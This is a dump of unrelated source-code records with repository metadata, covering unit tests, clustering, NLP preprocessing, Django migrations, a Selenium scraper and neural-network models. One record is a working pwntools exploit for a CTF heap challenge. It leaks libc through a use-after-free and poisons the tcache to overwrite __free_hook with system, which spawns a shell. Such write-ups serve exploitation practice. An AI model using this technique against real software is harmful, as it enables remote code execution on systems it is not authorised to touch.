#pylint: disable=import-outside-toplevel,too-few-public-methods,bad-continuation
"""
Unit-tests for covinfo module
"""
import unittest
import json
class Request:
"""
    Dummy request class mocking the attributes held by flask.Flask.request
"""
args = {}
def get(
self,
key,
):
"""
Return args
"""
return self.args[key]
class CovinfoTests(unittest.TestCase):
"""
Tests of covinfo module
"""
def setUp(self):
"""
Data and environment set-up for the tests
"""
from covinfo import main
self.main = main
self.request_empty = Request()
self.request = Request()
self.request_portugal_days_10 = Request()
self.request_portugal_days_10.args = {
'country': 'portugal',
'days': 10,
}
self.request.args = {
'country': 'poland',
'recoveryrate': ''
}
def test_get_daily_data_req_empty(self):
"""
Test if get_daily_data returns proper data if request args dict is
empty
"""
output = self.main.get_daily_data(self.request_empty)
self.assertIsInstance(
json.loads(output)[0],
dict,
)
def test_get_daily_data_req_args(self):
"""
Test if get_daily_data returns proper data
"""
output = self.main.get_daily_data(self.request)
self.assertIsInstance(
float(output),
float,
)
def test_get_changerate(self):
"""
        Test if get_changerate returns proper data for the change rate
"""
output = self.main.get_changerate(self.request_portugal_days_10)
#self.assertIsInstance(
# output,
# float,
#)
print(output)
|
[
"dariusz.izak@ibb.waw.pl"
] |
dariusz.izak@ibb.waw.pl
|
77e5a90be89e2b9b47ea56ee1ab0cebec00757b5
|
5eab827c7b49f87e010ad88430e3537b94f5fef4
|
/Project Exam-1/Individual Source Codes/Question-2.py
|
f7edd2f431e5fde39ed617119d00d1b07c3eb5d4
|
[] |
no_license
|
Shravyala/Python-Deep-Learning
|
4e6224d949c1a64515462e28cd81aa717de9aaa3
|
76e5d51dbdcca24619d44c4ac31eb29e3eb7180f
|
refs/heads/master
| 2022-11-25T14:27:23.702753
| 2020-07-30T05:03:01
| 2020-07-30T05:03:01
| 271,366,054
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,997
|
py
|
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.cluster import KMeans
from sklearn import metrics
import numpy as np
import seaborn as sns
# feed the data from Customers.csv into the data variable
data = pd.read_csv('Customers.csv')
# Null values condition check
nulls = pd.DataFrame(data.isnull().sum().sort_values(ascending=False)[:5])
nulls.columns = ['Null Count']
nulls.index.name = 'Feature'
print(nulls)
print(50*"==")
# Handling the null values if it has any
data = data.select_dtypes(include=[np.number]).interpolate().dropna()
# Use the elbow method to find a good number of clusters
wcss = []
# Take only the last two columns: annual income and spending score
x = data.iloc[:, 2:]
print(x)
#Visualising the data
sns.FacetGrid(x, height=4).map(plt.scatter, 'Annual Income (k$)', 'Spending Score (1-100)').add_legend()
plt.title('before clustering the data')
plt.show()
for i in range(1,11):
kmeans = KMeans(n_clusters=i, init='k-means++', max_iter=300, n_init=10, random_state=0)
kmeans.fit(x)
wcss.append(kmeans.inertia_)
plt.plot(range(1,11),wcss)
plt.xlabel('Number of Clusters')
plt.ylabel('wcss')
plt.title('Elbow Graph')
plt.show()
# Part 2:
# From the plot above, the curve's decrease levels off around 5 clusters, so we pick 5.
km =KMeans(n_clusters=5, random_state=0)
km.fit(x)
kmeans=km.predict(x)
# predict the cluster for each data point
y_cluster_kmeans = km.predict(x)
score = metrics.silhouette_score(x, y_cluster_kmeans)
print("Silhouette score is :",score)
x['res'] = y_cluster_kmeans
print(y_cluster_kmeans)
sns.FacetGrid(x,hue="res", height=4).map(plt.scatter, 'Annual Income (k$)', 'Spending Score (1-100)').add_legend()
plt.title('After clustering')
plt.show()
# Part 3:
# From the first plot we can see that the values are densely concentrated around
# five distinct points, so we can infer directly from the graph that 5 clusters
# is appropriate, which matches the result from the elbow graph.
|
[
"noreply@github.com"
] |
Shravyala.noreply@github.com
|
b50e909bcaf7a8eff6979490a05da8ef8b0d4eb3
|
b615302f6c5e4fbbd5b125523a660f7e5ebd97d1
|
/parse.py
|
1e7463b445488daeb02a2cdae04caa99dfe61420
|
[] |
no_license
|
cg439/MLProject
|
8bc4376862ed16b25a79b4b659a87209051d9110
|
95806cd354587bd653209fec14903990daa0e090
|
refs/heads/master
| 2021-01-18T14:05:15.351994
| 2014-12-11T04:50:19
| 2014-12-11T04:50:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,231
|
py
|
import nltk, re, os
#rev = os.listdir("Reviews/")
## Takes every review in the Reviews directory and appends it to reviews.txt.
# If reviews.txt already has content and you want to add more, delete that
# content first, or else it will be duplicated.
def concatReviews(filename):
    with open(filename) as f:
        content = f.readlines()
    revs = open("reviews.txt", "a")
    for line in content:
        revs.write(line)
    revs.close()  # close the output handle; f is already closed by the with-block
#the below code is ran only once to create a file containing all reviews
# for r in rev:
# r = "Reviews/" + r
# concatReviews(r)
# Splits a given file into sentences, appending them to a sentence array.
# It also maps each sentence fragment back to its source line in a hashtable.
def splitBySentence(filename):
sentences = []
sentenceMap = {}
with open(filename) as f:
content = f.readlines()
for line in content:
split = re.split(r'[?!.]', line)
for word in split:
sentenceMap[word] = line
sentences.append(split)
return sentences, sentenceMap
# Given an array of sentence strings, tokenize each one and POS-tag its words.
def posTag(sentences):
    tokens = []
    tagged = []
    for sent in sentences:
        toks = nltk.word_tokenize(sent)
        tokens.append(toks)
        tagged.append(nltk.pos_tag(toks))  # tag per sentence; pos_tag expects a flat token list
    return tokens, tagged
#example of how to use FreqDist. feed it an array of tokens.
#this returns 2 because 'abc' exists twice in the given array
#print nltk.FreqDist(['what', 'omg', 'abc', 'abc'])['abc']
#the below line finds the freq
#print nltk.FreqDist(['what', 'omg', 'abc', 'abc']).freq('abc')
#finds the most common n samples, n being 2 in this case, returning (sample, count)
#print nltk.FreqDist(['what', 'omg', 'abc', 'abc']).most_common(2)
#plots the frequency graph. require matplotlib
#nltk.FreqDist(['what','omg','abc','abc']).plot()
#tree creation, groups at given grammar
# grammar = "NP: {<DT>?<JJ>*<NN>}"
# cp = nltk.RegexpParser(grammar)
# result = cp.parse(sentence)
# print(result)
# result.draw()
#tree traversal
# def traverse(t):
# try:
# t.label()
# except AttributeError:
# print(t, end=" ")
# else:
# # Now we know that t.node is defined
# print('(', t.label(), end=" ")
# for child in t:
# traverse(child)
# print(')', end=" ")
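# --- Added usage sketch (not in the original) ---
# Assumes reviews.txt already exists (see concatReviews above) and that the
# nltk punkt/tagger models are installed. Splits the corpus into sentences,
# flattens the per-line fragment lists, then POS-tags each sentence.
if __name__ == '__main__':
    sents, smap = splitBySentence("reviews.txt")
    flat = [s for line in sents for s in line if s.strip()]
    tokens, tagged = posTag(flat)
    print(tagged[0])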
|
[
"lcatherine.2828@yahoo.com"
] |
lcatherine.2828@yahoo.com
|
2976312d0df5d7dcef475c8adbf0f1c5b199284e
|
de55ba824daaf87208396502d48132b541c45b55
|
/webanalysis/migrations/0001_initial.py
|
488865a71b2f18ac3845016b7f0fc11f4a682f08
|
[] |
no_license
|
SK2-Angel/CMDB_V1.0
|
efcfd16d0531c755f9d3e0b0f27b7c03fb29436f
|
5c19625a42395025ae9181844e9add8bcdfcd0c8
|
refs/heads/master
| 2020-12-09T05:47:02.732391
| 2020-01-11T11:36:26
| 2020-01-11T11:36:26
| 233,211,027
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 713
|
py
|
# Generated by Django 2.0.5 on 2019-12-02 14:46
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='AccessLogfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(default='', max_length=128)),
('path', models.CharField(default='', max_length=1024)),
('created_time', models.DateTimeField(auto_now_add=True)),
('status', models.IntegerField(default=0)),
],
),
]
|
[
"18530022535@163.com"
] |
18530022535@163.com
|
1bb2c38f5ac920acadf2b909fff16d8d37748f02
|
c47be0df7bf64f96f285061d886c1de1abb0d56e
|
/classes/Preprocessor.py
|
80d91332dcf79dda3e8e238415bf1a21211bd50f
|
[] |
no_license
|
UNREALre/TextAnalysis
|
e01fa78e84688285ae6386e77cf38adb18ce14f2
|
8c7ebb574cc208cfb2ce95f5fcc1fe82d06baa54
|
refs/heads/master
| 2022-11-06T01:10:37.056743
| 2020-06-23T13:44:14
| 2020-06-23T13:44:14
| 268,060,986
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,632
|
py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
from nltk import (pos_tag, sent_tokenize, wordpunct_tokenize)
from classes.CustomCorpusReader import HTMLCorpusReader
import os
import pickle
class Preprocessor(object):
"""Обёртка над HTMLCorpusReader"""
def __init__(self, corpus, target, **kwargs):
self.corpus = corpus
self.target = target
def fileids(self, fileids=None, categories=None):
fileids = self.corpus.resolve(fileids, categories)
if fileids:
return fileids
return self.corpus.fileids()
def abspath(self, fileid):
        # Find the directory path relative to the root of the source corpus
        parent = os.path.relpath(os.path.dirname(self.corpus.abspath(fileid)), self.corpus.root)
        # Pull apart the path components for reconstruction
        basename = os.path.basename(fileid)
        name, ext = os.path.splitext(basename)
        # Build a file name with the .pickle extension
        basename = name + '.pickle'
        # Return the file path relative to the root of the target corpus
        return os.path.normpath(os.path.join(self.target, parent, basename))
def tokenize(self, fileid):
for paragraph in self.corpus.paras(fileids=fileid):
yield[
pos_tag(wordpunct_tokenize(sent), lang='rus')
for sent in sent_tokenize(paragraph)
]
def process(self, fileid):
"""
Записывает трансформированный документ в виде сжатого архива в заданное место.
Вызывается для одного файла, проверяет местоположение на диске, чтобы избежать ошибок.
Использует tokenize() для предварительной обработки. Полученные данные и записываются в файл.
"""
        # Determine the path of the file to write the result to
        target = self.abspath(fileid)
        parent = os.path.dirname(target)
        # Make sure the directory exists
        if not os.path.exists(parent):
            os.makedirs(parent)
        # Make sure parent is a directory, not a file
        if not os.path.isdir(parent):
            raise ValueError("A directory must be provided for writing the processed data!")
        # Build the data structure to be written to the archive
        document = list(self.tokenize(fileid))
        # Write the data to the archive on disk
        with open(target, 'wb') as f:
            pickle.dump(document, f, pickle.HIGHEST_PROTOCOL)
        # Release the document from memory
        del document
        # Return the path to the target file
        return target
def transform(self, fileids=None, categories=None):
"""Метод, вызывающий process()"""
# Создаем целевой каталог, если он еще не создан
if not os.path.exists(self.target):
os.makedirs(self.target)
# Получить имена файлов для обработки
for fileid in self.fileids(fileids, categories):
yield self.process(fileid)
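# --- Added usage sketch ---
# Kept as comments because HTMLCorpusReader's exact constructor signature is
# not shown here; 'corpus/' and 'processed/' are placeholder paths.
#
# corpus = HTMLCorpusReader('corpus/')
# preprocessor = Preprocessor(corpus, 'processed/')
# for target in preprocessor.transform():
#     print(target)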
|
[
"avpmanager@gmail.com"
] |
avpmanager@gmail.com
|
145a60e8244e8c62053d46b2ed498514d3f30768
|
e5554dae331c863d3240c66ca0189cc784935f3e
|
/manage.py
|
3836d39c220a029eedcb437492acf5dca11d2aaa
|
[] |
no_license
|
momikenSneg/ecg_editor
|
3299fed4d173b92e52fb67577d3ed44606d907d3
|
7a9a9635ea8fb62af0fc5c31560b71eb47de6150
|
refs/heads/master
| 2023-04-06T00:09:33.824429
| 2021-04-06T10:06:00
| 2021-04-06T10:06:00
| 337,184,921
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 666
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'web_editor.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[
"e.snegireva@g.nsu.ru"
] |
e.snegireva@g.nsu.ru
|
c17ed168a9f913b2c1082c60adc0dd0b986ba84f
|
9758fa6d66df1121ff9e0b4a7da511653bc53cf1
|
/Food/migrations/0018_auto_20190825_1336.py
|
dc7b6dc448dd9060168379f3107d594f2f6dc47d
|
[] |
no_license
|
hdforoozan/Restaurant-project
|
179fb4138cb92bfd7716671c3b1e8b1949bfbaff
|
2ab096cbc3ee20557b57ed97bd0d5556c5965e87
|
refs/heads/master
| 2020-06-12T08:50:03.067740
| 2019-09-17T18:48:43
| 2019-09-17T18:48:43
| 194,250,030
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 398
|
py
|
# Generated by Django 2.2.2 on 2019-08-25 09:06
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Food', '0017_food_users_like'),
]
operations = [
migrations.AlterField(
model_name='food',
name='price',
field=models.DecimalField(decimal_places=2, max_digits=10),
),
]
|
[
"hdforoozan@gmail.com"
] |
hdforoozan@gmail.com
|
f9bf02e34f365e5136aaecfd9d27ccd68fbe9d0f
|
16557aae9ebe153c4719408e9ddce70f7c36a345
|
/DEKRACTF_2020/heapMePls/exploit.py
|
9a295c4ed19dfa7dcecc3287f017ca796b6ce7e0
|
[] |
no_license
|
FDlucifer/exploit-challenges-1
|
216b7cae40f163146b7b72f51a35a6eb2396d8d3
|
2fa1714410dd442ae684771408db985a8f13c85e
|
refs/heads/main
| 2023-03-14T08:33:45.604121
| 2021-03-07T18:09:14
| 2021-03-07T18:09:14
| 423,387,052
| 1
| 0
| null | 2021-11-01T08:15:35
| 2021-11-01T08:15:35
| null |
UTF-8
|
Python
| false
| false
| 2,404
|
py
|
from pwn import *
# --- Info ---
# CTF: DEKRA
# Date: -
# Challenge: HeapMePls
# Description: Simple tcache poisoning attack via Use-After-Free
# --- End Info ---
#context.log_level = 'debug'
context.terminal = ["tmux", "sp", "-h"]
context.endian = 'little'
PATH = './vuln'
LIBC = './libc-2.28.so'
ENV = {"LD_PRELOAD":"./libc-2.28.so"}
libc = ELF(LIBC, checksec = False)
binary = ELF(PATH, checksec = False)
REMOTE = 0
HOST = '168.119.247.237'
PORT = 5012
def add(n, name):
r.recvuntil('>')
r.sendline('1')
r.recvuntil('items: ')
r.sendline(str(int(n)))
r.recvuntil('Name: ')
r.sendline(name)
def edit(idx, n, name):
r.recvuntil('>')
r.sendline('4')
r.recvuntil('index: ')
r.sendline(str(int(idx)))
r.recvuntil('items: ')
r.sendline(str(int(n)))
r.recvuntil('Name: ')
r.sendline(name)
def show(idx):
r.recvuntil('>')
r.sendline('3')
r.recvuntil('index: ')
r.sendline(str(int(idx)))
def free(idx):
r.recvuntil('>')
r.sendline('2')
r.recvuntil('index: ')
r.sendline(str(int(idx)))
def pad(addr):
return addr + b'\x00'*(8-len(addr))
context.binary = PATH
if REMOTE:
r = remote(HOST, PORT)
else:
r = process(PATH, env=ENV)
#gdb.attach(r)
#pause()
add(1024, "AAAA") # 0
add(1024, "/bin/sh\x00") # 1
for _ in range(7):
add(1024, "AAAA")
for i in range(7):
free(i)
free(0) # 0
show(0)
leak = u64(pad(r.recvuntil('\n')[:-1]))
libc_base = leak - 0x3b0ca0
binsh = libc_base + 0x177b75
system = libc_base + libc.symbols['system'] #0x0000000000041b80
__free_hook = libc_base + libc.symbols['__free_hook']
__malloc_hook = libc_base + libc.symbols['__malloc_hook']
log.info('Leaked: libc base @ ' + hex(libc_base))
log.info('Leaked: system @ ' + hex(system))
log.info('Leaked: /bin/sh @ ' + hex(binsh))
log.info('Leaked: __free_hook @ ' + hex(__free_hook))
log.info('Leaked: __malloc_hook @ ' + hex(__malloc_hook))
add(0x80, "AAAA") # 9
add(0x80, "AAAA") # 10
free(9)
free(10)
'''
0x41a06 execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL
0x41a5a execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL
0xdfe81 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL
'''
edit(10, 0x80, p64(__free_hook))
add(0x80, "AAAA")
add(0x80, p64(system))
add(0x10, "/bin/bash\x00") # 13
pause()
free(13)
r.interactive()
r.close()
|
[
"noreply@github.com"
] |
FDlucifer.noreply@github.com
|
e5e187191960e5bd2599ed13047b11725d49c3ba
|
4a7a12ae309a4828ebe1f7ea813711314d881962
|
/selenium基本操作.py
|
962fdc1e3b2649c075fb1ccc29380cf10e2d7f7a
|
[] |
no_license
|
snakecook/selenium
|
44137252e2ef42684e71917f5dc6f162e7a596a0
|
5d9a92bfc98aa2aa0ddfad2455da8d3c374ec26e
|
refs/heads/master
| 2022-12-13T15:50:54.631963
| 2020-09-01T14:53:55
| 2020-09-01T14:53:55
| 292,028,815
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,440
|
py
|
'''
- Install selenium: pip install selenium
- Download the browser driver:
    - http://chromedriver.storage.googleapis.com/index.html
    - Mapping between driver and browser versions:
    - http://blog.csdn.net/huilan_same/article/details/51896672
- Instantiate a browser object
- Action chains:
    - a series of consecutive actions
- When locating an element that sits inside an iframe tag, a fixed step
  must be performed first: bro.switch_to.frame('iframe id')
- Headless browser: a browser without a visible UI
    - PhantomJS: no longer maintained
    - Google Chrome headless mode
- Making selenium evade detection
'''
from time import sleep
from selenium import webdriver
bro = webdriver.Chrome(executable_path=r'F:\cc\chaojiying\chaojiying_Python\chromedriver.exe')
# target page
bro.get('https://www.jd.com/')
# locate the element
search_input = bro.find_element_by_xpath('//*[@id="key"]')
search_input.send_keys('我叼你妈的!')
btn = bro.find_element_by_xpath('//*[@id="search"]/div/div[2]/button')
btn.click()
sleep(2)
# execute JS
# bro.execute_script('window.scrollTo(0,document.body.scrollHeight)') # scroll to the bottom
bro.execute_script('window.scrollTo(0,400)')
sleep(0.5)
bro.execute_script('window.scrollTo(0,800)')
sleep(0.5)
bro.execute_script('window.scrollTo(0,1200)')
sleep(2)
# get the page source
page_text = bro.page_source
print(page_text)
sleep(1)
bro.quit()
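# --- Added sketch ---
# The docstring above mentions headless Chrome and evading detection, but the
# script does not demonstrate them. A minimal sketch using real Chrome options
# (kept as comments so it does not relaunch a browser after quit(); verify the
# options against your Chrome/chromedriver versions):
#
# from selenium.webdriver import ChromeOptions
# opts = ChromeOptions()
# opts.add_argument('--headless')  # no visible UI
# opts.add_argument('--disable-gpu')
# opts.add_experimental_option('excludeSwitches', ['enable-automation'])
# bro = webdriver.Chrome(executable_path=r'...', options=opts)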
|
[
"112@qq.com"
] |
112@qq.com
|
0502814ae0a54fbd92c65e786d412a00fd32ba5e
|
bc527cc92afcf5eefe88f87ccfaf1c85d8e3abdf
|
/NN.py
|
e5ca75f0ad723d576a037b59f951480dc522bb6d
|
[] |
no_license
|
ehillis2/datamining
|
55648ff4bf2c65555e825cce7fea848d936ddcb0
|
68c0ab4a0c8344eaeb2d4e937ad2c612d88d7094
|
refs/heads/main
| 2023-02-06T05:08:32.226553
| 2020-12-24T17:33:25
| 2020-12-24T17:33:25
| 303,435,146
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,479
|
py
|
import processing
from sklearn.neural_network import MLPClassifier
from sklearn.model_selection import StratifiedKFold
from sklearn.decomposition import PCA
from sklearn import metrics
import numpy as np
import random
import pandas as pd
import matplotlib.pyplot as plt
import itertools as it
import operator
import sys
import math
import csv
import time
def NNmodelScore(model, trainingdata, traininglabels, testingdata, testinglabels):
model.fit(trainingdata, traininglabels.values.ravel())
return model.score(testingdata, testinglabels)
def NeuralNetwork(data_features, data_labels, nnmodel):
folds = StratifiedKFold(n_splits=10)
scores = []
for train_index, test_index in folds.split(data_features, data_labels):
X_train, X_test, y_train, y_test = data_features.iloc[train_index], data_features.iloc[test_index], \
data_labels.iloc[train_index], data_labels.iloc[test_index]
scores.append(100 * NNmodelScore(nnmodel,
X_train, y_train, X_test, y_test))
#print('these are the scores: ', scores)
#print('mean:', np.mean(scores))
return np.mean(scores)
NN_STD_means = []
NN_PCA_means = []
def mainNeuralNetworkImplementation(nnmodel, linPCA, training_dataframe, pca_option):
df = pd.read_csv("BreastCancerData.csv")
column_titles = None
column_titles = processing.processData(df, column_titles)
column_titles = np.array(column_titles)
training_data = []
final_validation = []
processing.splitData(training_dataframe, .8,
training_data, final_validation)
training_data = np.array(training_data)
final_validation = np.array(final_validation)
features = []
labels = []
features, labels = processing.createFeatures_Labels(training_data)
np.transpose(labels)
features_data = None
labels_data = None
features_data, labels_data = processing.convertToDataFrame(
features, labels, column_titles)
if(pca_option == 'both'):
        #print('Neural network model without PCA')
NN_STD_means.append(NeuralNetwork(
features_data, labels_data, nnmodel))
# print()
features_data_PCA = processing.linearPCAReduction(
features_data, linPCA)
features_df_PCA = pd.DataFrame(
features_data_PCA, columns=column_titles[1:(features_data_PCA.shape[1] + 1)])
        #print('Neural network model with PCA')
NN_PCA_means.append(NeuralNetwork(
features_df_PCA, labels_data, nnmodel))
elif(pca_option == 'yes'):
features_data_PCA = processing.linearPCAReduction(
features_data, linPCA)
features_df_PCA = pd.DataFrame(
features_data_PCA, columns=column_titles[1:(features_data_PCA.shape[1] + 1)])
        #print('Neural network model with PCA')
NN_PCA_means.append(NeuralNetwork(
features_df_PCA, labels_data, nnmodel))
else:
NN_STD_means.append(NeuralNetwork(
features_data, labels_data, nnmodel))
# print()
def NeuralNetworkSimulation(nnmodel, linPCA, training_dataframe, pca_option):
print()
if(pca_option == 'both'):
start = time.time()
number = 1
print('Simulating neural network model...')
for i in range(0, number):
#print('neural network simulation number', i, 'finished')
mainNeuralNetworkImplementation(
nnmodel, linPCA, training_dataframe, pca_option)
end = time.time()
print('Neural Network Simulation time:', end - start)
m = None
if np.mean(NN_STD_means) > np.mean(NN_PCA_means):
m = 'STANDARD MODEL'
else:
m = 'PCA TRANSFORMED MODEL'
count = 0
for i in range(0, number):
if(NN_PCA_means[i] > NN_STD_means[i]):
count = count + 1
print()
        print('number of times neural network pca transformed model had greater accuracy than neural network standard model: ',
              count, 'out of ', number)
print('neural network variance in accuracy for standard model: ',
np.var(NN_STD_means))
print('neural network variance in accuracy for pca transform model: ',
np.var(NN_PCA_means))
print('neural network standard model accuracy: ', np.mean(NN_STD_means))
print('neural network pca transformed model accuracy: ',
np.mean(NN_PCA_means))
print('maximum neural network accuracy on 10fold cross-val test data attained by', m, "with an accuracy of: ", max(
np.mean(NN_PCA_means), np.mean(NN_STD_means)), '%')
print()
elif(pca_option == 'yes'):
start = time.time()
number = 1
print('Simulating pca transformed neural network model...')
for i in range(0, number):
mainNeuralNetworkImplementation(
nnmodel, linPCA, training_dataframe, pca_option)
end = time.time()
print('Neural Network Simulation time:', end - start)
print()
print('pca transform neural network model variance in accuracy: ',
np.var(NN_PCA_means))
print('pca transformed neural network model accuracy on 10fold cross-val test data: ',
np.mean(NN_PCA_means))
print()
else:
number = 1
start = time.time()
print('Simulating standard neural network model...')
for i in range(0, number):
#print('neural network simulation number', i, 'finished')
mainNeuralNetworkImplementation(
nnmodel, linPCA, training_dataframe, pca_option)
end = time.time()
print('Neural Network Simulation time:', end - start)
print()
print('standard neural network model variance in accuracy: ',
np.var(NN_STD_means))
print('standard neural network model accuracy on 10fold cross-val test data: ',
np.mean(NN_STD_means))
print()
nn = MLPClassifier(random_state=1, solver='lbfgs')
nn_sgd = MLPClassifier(random_state=1, solver='sgd')
"""
start = time.time()
mainNeuralNetworkImplementation(
nn, processing.linear_pca, processing.overall_training_data)
end = time.time()
print('Time of mainNeuralNetworkImplementation', end - start)
#NeuralNetworkSimulation(nn, processing.linear_pca,
# processing.overall_training_data)
"""
|
[
"noreply@github.com"
] |
ehillis2.noreply@github.com
|
2c42d501c2cf98bb835561f7ce5a97d59d48ecb3
|
a05da5da30f1e2b72ed1686d847544215ce2e1f1
|
/xrit-header.py
|
b714c563ba88eb4a25889b5857ddd444a1a344c3
|
[] |
no_license
|
cdzkhxhdgs/COMS-1
|
fb45184e40b393e274da8ba00ad0544280b3f1f5
|
fbcf2113bfe84d00cd43d95119d2ff50169dc9a3
|
refs/heads/master
| 2020-04-13T07:40:58.257874
| 2018-10-03T09:46:16
| 2018-10-03T09:46:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,036
|
py
|
"""
xrit-header.py
https://github.com/sam210723/coms-1
Parses xRIT file and displays header information in a human-readable format.
"""
import argparse
from coms import COMS as comsClass
argparser = argparse.ArgumentParser(description="Parses xRIT file and displays header information in a human-readable format.")
argparser.add_argument("PATH", action="store", help="Input xRIT file")
args = argparser.parse_args()
# Create COMS class instance and load xRIT file
COMS = comsClass(args.PATH)
# Primary Header (type 0, required)
COMS.parsePrimaryHeader(True)
# START OPTIONAL HEADERS
COMS.parseImageStructureHeader(True)
COMS.parseImageNavigationHeader(True)
COMS.parseImageDataFunctionHeader(True)
COMS.parseAnnotationTextHeader(True)
COMS.parseTimestampHeader(True)
COMS.parseAncillaryTextHeader(True)
COMS.parseKeyHeader(True)
COMS.parseImageSegmentationInformationHeader(True)
COMS.parseImageCompensationInformationHeader(True)
COMS.parseImageObservationTimeHeader(True)
COMS.parseImageQualityInformationHeader(True)
|
[
"sam210723@hotmail.com"
] |
sam210723@hotmail.com
|
0279b8479bb0638490b8d8cc6a83aab30c0a06f1
|
605d63d23bc2e07eb054979a14557d469787877e
|
/atest/testresources/testlibs/pythonmodule/submodule/__init__.py
|
ce29c8eedcad746723f5da941daf6c4288ee44fe
|
[
"Apache-2.0",
"CC-BY-3.0"
] |
permissive
|
robotframework/robotframework
|
407b0cdbe0d3bb088f9bfcf9ea7d16e22eee1ddf
|
cf896995f822f571c33dc5651d51365778b1cf40
|
refs/heads/master
| 2023-08-29T03:19:00.734810
| 2023-08-27T18:14:48
| 2023-08-28T18:14:11
| 21,273,155
| 8,635
| 2,623
|
Apache-2.0
| 2023-09-05T04:58:08
| 2014-06-27T11:10:38
|
Python
|
UTF-8
|
Python
| false
| false
| 15
|
py
|
attribute = 42
|
[
"peke@iki.fi"
] |
peke@iki.fi
|
b494d146fd39b85413b9ab89babb6933f9662bf8
|
6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4
|
/RejGBWcKsKM2PANip_6.py
|
57e62895a1c80b85fd33ca4de87e610fdce8abd7
|
[] |
no_license
|
daniel-reich/ubiquitous-fiesta
|
26e80f0082f8589e51d359ce7953117a3da7d38c
|
9af2700dbe59284f5697e612491499841a6c126f
|
refs/heads/master
| 2023-04-05T06:40:37.328213
| 2021-04-06T20:17:44
| 2021-04-06T20:17:44
| 355,318,759
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 43
|
py
|
number_syllables=lambda w:w.count('-')+1
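# Added quick check of the one-liner above: syllables are assumed to be
# separated by hyphens, so a word with three hyphens has four syllables.
assert number_syllables("ne-ver-the-less") == 4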
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
66038a6a9f3d13ab170760381bc61b357fad59f0
|
8a1ca658c1ace3ac6aff98d4547b20c5442fea98
|
/wrn.py
|
21c975f969a1022d8a986d4f2fee3e9bd86ecf42
|
[
"BSD-2-Clause"
] |
permissive
|
GRSEB9S/wrn
|
00986a6caccd48c4a57dc0fa51f23a83ff6828ce
|
5c8873b9dcaa73c9f5aaa4f5767e5e95a32f7df2
|
refs/heads/master
| 2021-06-23T14:16:41.589262
| 2017-08-31T11:53:36
| 2017-08-31T11:53:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,677
|
py
|
from keras import layers, models, regularizers
def building_block(inputs, double_filters, weight_decay, dropout):
"""Create basic building block for WRN."""
try:
layer_id = building_block.id
except AttributeError:
building_block.id = 1
layer_id = 1
x = layers.BatchNormalization(name='l' + str(layer_id) + '_bn1')(inputs)
x = layers.Activation('relu')(x)
x = layers.Dropout(dropout)(x)
if double_filters:
n_filters = int(inputs.shape[-1]) * 2
add = layers.Conv2D(n_filters, (2, 2), kernel_regularizer=regularizers.l2(weight_decay), strides=(2, 2), trainable=False, name='l' + str(layer_id) + '_Ws')(inputs)
stride = 2
x = layers.Conv2D(n_filters, (3, 3), kernel_regularizer=regularizers.l2(weight_decay), strides=(stride, stride), padding='same', name='l' + str(layer_id) + '_conv1_3x3x' + str(n_filters) + '_stride_' + str(stride))(x)
else:
n_filters = int(inputs.shape[-1])
add = inputs
x = layers.Conv2D(n_filters, (3, 3), kernel_regularizer=regularizers.l2(weight_decay), padding='same', name='l' + str(layer_id) + '_conv1_3x3x' + str(n_filters))(x)
x = layers.BatchNormalization(name='l' + str(layer_id) + '_bn2')(x)
x = layers.Activation('relu')(x)
x = layers.Dropout(dropout)(x)
x = layers.Conv2D(n_filters, (3, 3), kernel_regularizer=regularizers.l2(weight_decay), padding='same', name='l' + str(layer_id) + '_conv2_3x3x' + str(n_filters))(x)
building_block.id += 1
return layers.Add(name='l' + str(layer_id) + '_add')([x, add])
def build_wrn(inputs, n_classes, first_layer_kernel=(3, 3), first_layer_strides=(1, 1), groups=3, blocks_in_groups=1, filters_mult=1, dropout=0., weight_decay=0., include_batch_norm=True):
"""Create WRN."""
n_filters_1st_layer = 16 * filters_mult
t = layers.BatchNormalization(name='bn0')(inputs)
t = layers.Conv2D(n_filters_1st_layer, first_layer_kernel, kernel_regularizer=regularizers.l2(weight_decay), strides=first_layer_strides, padding='same', activation='relu', name='conv0_7x7x' + str(n_filters_1st_layer) + '_stride2')(t)
for i in range(groups):
t = building_block(t, i > 0, weight_decay, dropout)
for _ in range(blocks_in_groups - 1):
t = building_block(t, False, weight_decay, dropout)
t = layers.BatchNormalization(name='last_bn')(t)
t = layers.Activation('relu')(t)
t = layers.pooling.GlobalAveragePooling2D(name='global_avg_pool')(t)
t = layers.Dense(n_classes, kernel_regularizer=regularizers.l2(weight_decay), name='output')(t)
t = layers.Activation('softmax')(t)
return models.Model(inputs=inputs, outputs=t)
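# --- Added usage sketch ---
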